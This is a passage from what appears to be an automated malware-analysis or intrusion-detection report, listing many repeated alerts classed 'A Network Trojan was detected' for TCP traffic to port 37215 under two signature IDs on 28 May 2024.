                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.927116
                  SID:2835222
                  Source Port:38828
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.742781
                  SID:2829579
                  Source Port:51764
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.908190
                  SID:2829579
                  Source Port:36820
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.908513
                  SID:2835222
                  Source Port:57442
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.586337
                  SID:2829579
                  Source Port:37324
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.794622
                  SID:2835222
                  Source Port:33108
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.888254
                  SID:2829579
                  Source Port:54252
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.319110
                  SID:2829579
                  Source Port:56236
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.576161
                  SID:2835222
                  Source Port:48966
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.765376
                  SID:2835222
                  Source Port:53620
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.528961
                  SID:2829579
                  Source Port:34560
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.796877
                  SID:2835222
                  Source Port:44912
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.843703
                  SID:2835222
                  Source Port:45176
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.542775
                  SID:2835222
                  Source Port:42718
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.781093
                  SID:2829579
                  Source Port:52504
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.942584
                  SID:2835222
                  Source Port:48292
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.278874
                  SID:2835222
                  Source Port:34832
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.780909
                  SID:2829579
                  Source Port:46546
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.846619
                  SID:2835222
                  Source Port:33534
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.886830
                  SID:2835222
                  Source Port:40022
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.888403
                  SID:2829579
                  Source Port:56978
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.589981
                  SID:2835222
                  Source Port:34168
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.923868
                  SID:2829579
                  Source Port:49120
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.656509
                  SID:2829579
                  Source Port:54570
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.542652
                  SID:2835222
                  Source Port:33824
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.737946
                  SID:2835222
                  Source Port:39170
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.920019
                  SID:2835222
                  Source Port:40942
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.661554
                  SID:2835222
                  Source Port:50216
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.859233
                  SID:2835222
                  Source Port:43626
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.316290
                  SID:2835222
                  Source Port:48644
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.543492
                  SID:2835222
                  Source Port:34340
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.789784
                  SID:2835222
                  Source Port:53642
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.920865
                  SID:2835222
                  Source Port:48882
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.775881
                  SID:2829579
                  Source Port:34676
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.546173
                  SID:2829579
                  Source Port:34716
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.628508
                  SID:2829579
                  Source Port:45310
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.292637
                  SID:2829579
                  Source Port:39872
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.795550
                  SID:2835222
                  Source Port:49060
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.658965
                  SID:2829579
                  Source Port:48760
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.796934
                  SID:2835222
                  Source Port:56622
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.491191
                  SID:2835222
                  Source Port:46724
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.604068
                  SID:2835222
                  Source Port:43074
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.785690
                  SID:2835222
                  Source Port:60626
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.818010
                  SID:2835222
                  Source Port:50792
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.912518
                  SID:2829579
                  Source Port:53856
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.588690
                  SID:2829579
                  Source Port:53664
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.888335
                  SID:2829579
                  Source Port:42662
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.601611
                  SID:2829579
                  Source Port:37636
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.742324
                  SID:2829579
                  Source Port:55300
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.649564
                  SID:2835222
                  Source Port:37456
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.665547
                  SID:2829579
                  Source Port:49376
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.318409
                  SID:2829579
                  Source Port:47828
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.790739
                  SID:2835222
                  Source Port:51028
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.719228
                  SID:2835222
                  Source Port:48814
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.277335
                  SID:2835222
                  Source Port:37748
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.695678
                  SID:2835222
                  Source Port:46998
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.887264
                  SID:2829579
                  Source Port:38142
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.600647
                  SID:2829579
                  Source Port:58012
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.880010
                  SID:2835222
                  Source Port:56076
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.604022
                  SID:2835222
                  Source Port:59616
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.766539
                  SID:2829579
                  Source Port:36652
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.788953
                  SID:2835222
                  Source Port:58998
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.806128
                  SID:2829579
                  Source Port:56888
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.296953
                  SID:2835222
                  Source Port:39820
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.907234
                  SID:2835222
                  Source Port:54050
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.628405
                  SID:2829579
                  Source Port:49260
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.788856
                  SID:2835222
                  Source Port:54912
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.844808
                  SID:2835222
                  Source Port:56684
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.298633
                  SID:2829579
                  Source Port:47146
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.487865
                  SID:2835222
                  Source Port:48016
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.487899
                  SID:2835222
                  Source Port:36930
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.295997
                  SID:2835222
                  Source Port:60390
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.857468
                  SID:2835222
                  Source Port:40578
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.543829
                  SID:2835222
                  Source Port:33476
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.696381
                  SID:2829579
                  Source Port:57024
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.601730
                  SID:2829579
                  Source Port:50140
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.767793
                  SID:2829579
                  Source Port:49072
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.563526
                  SID:2835222
                  Source Port:54480
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.886576
                  SID:2835222
                  Source Port:40830
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.495937
                  SID:2835222
                  Source Port:49742
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.795316
                  SID:2835222
                  Source Port:41576
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.911551
                  SID:2835222
                  Source Port:60488
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.277346
                  SID:2829579
                  Source Port:38008
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.604607
                  SID:2835222
                  Source Port:59928
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.791325
                  SID:2835222
                  Source Port:51578
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.531556
                  SID:2835222
                  Source Port:39054
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.537259
                  SID:2835222
                  Source Port:59838
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.312234
                  SID:2835222
                  Source Port:55308
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.536110
                  SID:2829579
                  Source Port:53708
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.583726
                  SID:2835222
                  Source Port:51864
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.661515
                  SID:2835222
                  Source Port:46620
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.719036
                  SID:2829579
                  Source Port:58270
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.790963
                  SID:2835222
                  Source Port:49242
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.628512
                  SID:2835222
                  Source Port:58458
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.769341
                  SID:2835222
                  Source Port:34086
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.283773
                  SID:2835222
                  Source Port:41620
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.294506
                  SID:2835222
                  Source Port:53518
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.584127
                  SID:2829579
                  Source Port:33590
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.766490
                  SID:2835222
                  Source Port:52278
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.864997
                  SID:2835222
                  Source Port:33502
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.588688
                  SID:2829579
                  Source Port:55266
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.583318
                  SID:2829579
                  Source Port:54538
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.761046
                  SID:2835222
                  Source Port:42824
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.315516
                  SID:2829579
                  Source Port:57626
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.789391
                  SID:2829579
                  Source Port:54600
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.491198
                  SID:2829579
                  Source Port:56494
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.628503
                  SID:2835222
                  Source Port:59642
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.742831
                  SID:2835222
                  Source Port:40120
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.870646
                  SID:2835222
                  Source Port:58314
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.578071
                  SID:2829579
                  Source Port:37774
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.659589
                  SID:2835222
                  Source Port:45028
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.788874
                  SID:2835222
                  Source Port:43554
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.578931
                  SID:2829579
                  Source Port:45082
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.920009
                  SID:2835222
                  Source Port:60814
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.814136
                  SID:2835222
                  Source Port:59870
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.785803
                  SID:2829579
                  Source Port:45676
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.926057
                  SID:2829579
                  Source Port:48108
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.531420
                  SID:2835222
                  Source Port:41176
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.583313
                  SID:2829579
                  Source Port:39026
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.786447
                  SID:2835222
                  Source Port:44004
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.529775
                  SID:2829579
                  Source Port:60342
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.590998
                  SID:2835222
                  Source Port:46564
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.545295
                  SID:2829579
                  Source Port:39718
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.609822
                  SID:2835222
                  Source Port:41166
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.664850
                  SID:2835222
                  Source Port:43438
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.490201
                  SID:2835222
                  Source Port:48392
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.490329
                  SID:2829579
                  Source Port:51532
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.718833
                  SID:2829579
                  Source Port:42538
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:28.922838
                  SID:2835222
                  Source Port:58040
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.791687
                  SID:2829579
                  Source Port:34634
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.661348
                  SID:2835222
                  Source Port:46082
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.277633
                  SID:2835222
                  Source Port:44126
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.324218
                  SID:2835222
                  Source Port:58612
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.300121
                  SID:2835222
                  Source Port:53408
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.536979
                  SID:2835222
                  Source Port:50816
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.579594
                  SID:2829579
                  Source Port:50382
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.846637
                  SID:2829579
                  Source Port:59452
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.550962
                  SID:2829579
                  Source Port:58608
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.546596
                  SID:2829579
                  Source Port:38804
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.576141
                  SID:2829579
                  Source Port:40100
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.584524
                  SID:2829579
                  Source Port:56186
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.907992
                  SID:2829579
                  Source Port:53118
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.843731
                  SID:2829579
                  Source Port:50948
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.596682
                  SID:2835222
                  Source Port:46102
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.488555
                  SID:2829579
                  Source Port:60392
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.602013
                  SID:2829579
                  Source Port:44332
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.696133
                  SID:2829579
                  Source Port:51218
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.768649
                  SID:2829579
                  Source Port:40518
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.864829
                  SID:2829579
                  Source Port:48062
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.586779
                  SID:2829579
                  Source Port:41470
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.491404
                  SID:2835222
                  Source Port:35416
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.315516
                  SID:2835222
                  Source Port:45950
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.547380
                  SID:2829579
                  Source Port:57032
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.546708
                  SID:2835222
                  Source Port:51040
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.577616
                  SID:2835222
                  Source Port:60258
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.912188
                  SID:2829579
                  Source Port:46980
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.846380
                  SID:2835222
                  Source Port:34580
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.488130
                  SID:2829579
                  Source Port:36394
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.696042
                  SID:2829579
                  Source Port:39872
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.278850
                  SID:2829579
                  Source Port:56976
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.489394
                  SID:2835222
                  Source Port:34158
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.766698
                  SID:2829579
                  Source Port:47212
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.906712
                  SID:2835222
                  Source Port:56440
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.579627
                  SID:2835222
                  Source Port:35194
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.546525
                  SID:2835222
                  Source Port:59620
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.661674
                  SID:2835222
                  Source Port:48458
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.545923
                  SID:2835222
                  Source Port:47092
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.798532
                  SID:2835222
                  Source Port:56670
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.576825
                  SID:2835222
                  Source Port:56254
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.546556
                  SID:2829579
                  Source Port:33958
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.795434
                  SID:2829579
                  Source Port:36992
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.684303
                  SID:2835222
                  Source Port:49458
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.678634
                  SID:2829579
                  Source Port:42810
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.296996
                  SID:2829579
                  Source Port:39058
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.792552
                  SID:2829579
                  Source Port:43490
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.918874
                  SID:2829579
                  Source Port:49090
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.537209
                  SID:2835222
                  Source Port:57652
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.749972
                  SID:2829579
                  Source Port:60508
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.488840
                  SID:2829579
                  Source Port:44092
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.719488
                  SID:2829579
                  Source Port:42580
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:28.922689
                  SID:2829579
                  Source Port:42160
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.911549
                  SID:2829579
                  Source Port:52584
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.793579
                  SID:2829579
